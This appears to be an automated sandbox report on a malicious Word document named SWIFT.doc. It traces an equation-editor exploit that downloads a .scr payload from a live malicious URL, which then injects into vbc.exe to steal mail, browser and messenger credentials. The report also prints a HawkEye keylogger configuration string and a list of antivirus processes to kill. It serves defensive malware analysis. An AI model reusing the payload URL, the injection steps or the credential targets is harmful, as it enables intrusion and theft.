Source: C:\Users\user\AppData\Roaming\izux978537.scr Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp' Jump to behavior
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\izux978537.scr Queries volume information: C:\Users\user\AppData\Roaming\izux978537.scr VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Queries volume information: C:\Users\user\AppData\Roaming\izux978537.scr VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 10_2_004073B6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00406282 GetVersionExA, 10_2_00406282
Source: C:\Users\user\AppData\Roaming\izux978537.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: bdagent.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: MSASCui.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avguard.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgrsx.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avcenter.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avp.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: zlclient.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgcsrvx.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgnt.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: hijackthis.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgui.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgwdsvc.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: mbam.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: MsMpEng.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: ComboFix.exe

Stealing of Sensitive Information:

barindex
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE
Yara detected M00nD3v Logger
Source: Yara match File source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Yara detected MailPassView
Source: Yara match File source: 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2226541368.0000000004335000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2376684630.0000000002C3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2376638694.0000000002C1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2378260409.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2378154261.0000000002D45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1492, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 948, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Searches for Windows Mail specific files
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery * Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\izux978537.scr File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 10_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 10_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 10_2_004033B1
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: number of queries: 1002

Remote Access Functionality:

barindex
Detected HawkEye Rat
Source: izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_LoopPasswordStealer_KeyStrokeLogger_EmptyKeyStroke_ClipboardLogger_EmptyClipboard_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE
Yara detected M00nD3v Logger
Source: Yara match File source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 330287 Sample: SWIFT.doc Startdate: 14/12/2020 Architecture: WINDOWS Score: 100 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 13 other signatures 2->48 8 EQNEDT32.EXE 11 2->8         started        13 WINWORD.EXE 336 18 2->13         started        15 EQNEDT32.EXE 2->15         started        process3 dnsIp4 36 mangero.ga 46.173.221.33, 49167, 80 GPI-ASRU Russian Federation 8->36 30 C:\Users\user\AppData\...\izux978537.scr, PE32 8->30 dropped 32 C:\Users\user\AppData\...\hktestfile[1].scr, PE32 8->32 dropped 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->66 17 izux978537.scr 8->17         started        34 C:\Users\user\Desktop\~$SWIFT.doc, data 13->34 dropped file5 signatures6 process7 signatures8 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->38 40 Injects a PE file into a foreign processes 17->40 20 izux978537.scr 12 17->20         started        23 izux978537.scr 17->23         started        process9 signatures10 50 Tries to harvest and steal browser information (history, passwords, etc) 20->50 52 Writes to foreign memory regions 20->52 54 Allocates memory in foreign processes 20->54 56 2 other signatures 20->56 25 vbc.exe 20->25         started        28 vbc.exe 20->28         started        process11 signatures12 58 Tries to steal Mail credentials (via file registry) 25->58 60 Tries to steal Instant Messenger accounts or passwords 25->60 62 Tries to steal Mail credentials (via file access) 25->62 64 Searches for Windows Mail specific files 28->64
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.173.221.33
 unknown Russian Federation
56364 GPI-ASRU true

Contacted Domains

Name IP Active
mangero.ga 46.173.221.33 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://mangero.ga/izux/hktestfile.scr true
  • Avira URL Cloud: malware
 unknown